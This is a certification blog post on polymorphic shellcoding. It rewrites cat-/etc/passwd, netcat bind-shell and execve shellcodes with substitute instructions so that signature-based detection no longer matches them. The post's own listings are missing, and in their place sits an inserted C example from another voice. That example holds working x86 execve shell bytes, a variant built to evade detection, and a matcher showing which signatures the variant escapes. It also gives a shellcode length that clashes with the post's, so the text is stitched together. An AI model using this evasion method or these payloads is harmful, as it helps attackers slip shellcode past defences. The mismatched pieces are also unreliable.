Art of Shellcoding: Polymorphic Shellcodes
Polymorphic shellcode helps defeat signature-based pattern matching. A good shellcode does not rely on polymorphism alone but combines several techniques: encoding, encryption, and polymorphism. In this post we take three shellcodes and convert each one into a polymorphic version. A polymorphic shellcode keeps the functionality of the original but implements it with a different sequence of instructions; in other words, polymorphism is nothing more than doing the same thing with different instructions, so that a byte signature written for the original no longer matches.
/bin/cat /etc/passwd Shellcode
The first payload is from http://shell-storm.org/shellcode/files/shellcode-571.php . It is a simple /bin/cat shellcode that prints the contents of the /etc/passwd file. The code is as follows:
Throughout the shellcode we used ADD, SUB, INC and DEC instructions in place of the original ones, so that the byte sequences a signature for the original would key on no longer appear. On compiling and running the code, we get the following output:
Original Payload Length: 43 Bytes
Polymorphic Version Length: 61 Bytes
Change %age : 42% Increase
Netcat Bind TCP Shellcode
The next shellcode is a netcat bind TCP shellcode: it listens on port 17771 and presents a system shell to whoever connects. The original shellcode can be downloaded from http://shell-storm.org/shellcode/files/shellcode-872.php and is 58 bytes in length. Using the same approach as for the previous shellcode, let's see what a polymorphic version looks like:
The code is pretty straightforward. We only replaced the instructions a signature would key on, not every instruction. ESI is used again, as in the previous shellcode, and this time EDI is used as well. On executing the shellcode:
Original Payload Length: 58 Bytes
Polymorphic Version Length: 86 Bytes
Change %age : 48% Increase
Execve Shellcode
The last shellcode is an execve shellcode from http://shell-storm.org/shellcode/files/shellcode-575.php and is 21 bytes in length. It does nothing more than spawn a local shell. Let's make a polymorphic version of it as follows:
We used the same techniques as for the previous shellcodes.
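As an added illustration (my own code, not the post's listing and not shell-storm's shellcode-575), the following C program places the classic 23-byte x86-32 execve("/bin//sh") shellcode beside a hand-made polymorphic variant built with the same kind of substitutions described above: sub for xor, mov-to-register plus push for push imm32, push esp / pop reg for mov reg,esp, and xor al for mov al. It then runs a naive byte-signature matcher over both. The signatures and the percentage arithmetic are constructed for the example; the program never executes the shellcode, it only compares bytes.

```c
/* Added example (not the post's own listing): an original x86-32 execve
 * shellcode beside a hand-rolled polymorphic variant, plus a naive
 * byte-signature matcher of the kind instruction substitution defeats.
 * Nothing here executes the shellcode; it only compares byte strings. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Classic 23-byte execve("/bin//sh", ["/bin//sh"], envp) shellcode. */
static const unsigned char original[] = {
    0x31, 0xc0,                   /* xor  eax, eax               */
    0x50,                         /* push eax        ; NUL        */
    0x68, 0x2f, 0x2f, 0x73, 0x68, /* push 0x68732f2f ; "//sh"     */
    0x68, 0x2f, 0x62, 0x69, 0x6e, /* push 0x6e69622f ; "/bin"     */
    0x89, 0xe3,                   /* mov  ebx, esp   ; path       */
    0x50,                         /* push eax        ; NULL       */
    0x53,                         /* push ebx        ; argv[0]    */
    0x89, 0xe1,                   /* mov  ecx, esp   ; argv       */
    0xb0, 0x0b,                   /* mov  al, 11     ; sys_execve */
    0xcd, 0x80                    /* int  0x80                    */
};

/* Polymorphic variant (my own, assumed equivalent): each instruction a
 * signature is likely to key on is swapped for an equivalent sequence.
 * cdq additionally zeroes edx so envp is a clean NULL. */
static const unsigned char polymorphic[] = {
    0x29, 0xc0,                   /* sub  eax, eax   ; was xor eax,eax */
    0x99,                         /* cdq             ; edx = 0         */
    0x50,                         /* push eax                          */
    0xbe, 0x2f, 0x2f, 0x73, 0x68, /* mov  esi, 0x68732f2f              */
    0x56,                         /* push esi        ; was push imm32  */
    0xbf, 0x2f, 0x62, 0x69, 0x6e, /* mov  edi, 0x6e69622f              */
    0x57,                         /* push edi                          */
    0x54, 0x5b,                   /* push esp ; pop ebx ; was mov ebx,esp */
    0x50,                         /* push eax                          */
    0x53,                         /* push ebx                          */
    0x54, 0x59,                   /* push esp ; pop ecx ; was mov ecx,esp */
    0x34, 0x0b,                   /* xor  al, 0x0b   ; al was 0, so al = 11 */
    0xcd, 0x80                    /* int  0x80                         */
};

/* Constructed signatures in the style of a byte-pattern rule: the
 * xor/push prologue and the mov/push/int epilogue of the original. */
static const unsigned char sig_prologue[] = { 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68 };
static const unsigned char sig_epilogue[] = { 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80 };
/* A signature on the string immediate alone ("//sh") survives substitution. */
static const unsigned char sig_string[]   = { 0x2f, 0x2f, 0x73, 0x68 };

/* Offset of the first occurrence of pat in buf, or -1 if absent. */
static long find_pattern(const unsigned char *buf, size_t len,
                         const unsigned char *pat, size_t plen)
{
    if (plen == 0 || plen > len) return -1;
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0) return (long)i;
    return -1;
}

/* 1 if the buffer contains a NUL byte (fatal for strcpy-delivered payloads). */
static int has_null_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00) return 1;
    return 0;
}

/* Size growth of the variant over the original, percent, rounded to nearest. */
static int growth_percent(size_t orig_len, size_t poly_len)
{
    return (int)(((poly_len - orig_len) * 100 + orig_len / 2) / orig_len);
}

static void report(const char *name, const unsigned char *pat, size_t plen)
{
    printf("%-10s original@%ld  polymorphic@%ld\n", name,
           find_pattern(original, sizeof original, pat, plen),
           find_pattern(polymorphic, sizeof polymorphic, pat, plen));
}

int main(void)
{
    printf("Original Payload Length: %zu Bytes\n", sizeof original);
    printf("Polymorphic Version Length: %zu Bytes\n", sizeof polymorphic);
    printf("Change %%age : %d%% Increase\n",
           growth_percent(sizeof original, sizeof polymorphic));
    printf("NUL bytes: original=%d polymorphic=%d\n",
           has_null_byte(original, sizeof original),
           has_null_byte(polymorphic, sizeof polymorphic));
    report("prologue", sig_prologue, sizeof sig_prologue);
    report("epilogue", sig_epilogue, sizeof sig_epilogue);
    report("string", sig_string, sizeof sig_string);
    return 0;
}
```

The prologue and epilogue signatures match the original and miss the variant, which is the whole point of the substitutions. The "//sh" immediate, however, is found in both, because instruction substitution leaves data bytes untouched; that is why the post recommends combining polymorphism with encoding or encryption rather than relying on it alone. To confirm that both byte strings really disassemble to equivalent code, write them to a file and run `objdump -D -b binary -m i386 -M intel file.bin` before testing in a shellcode loader.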
Original Payload Length: 21 Bytes
Polymorphic Version Length: 22 Bytes
Change %age : 4.8% Increase
On running the shellcode, we get the following output:
Throughout this post we saw how a single operation can be performed in many different ways using different instructions. In the next post, we will see how to write our own crypter.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE-1080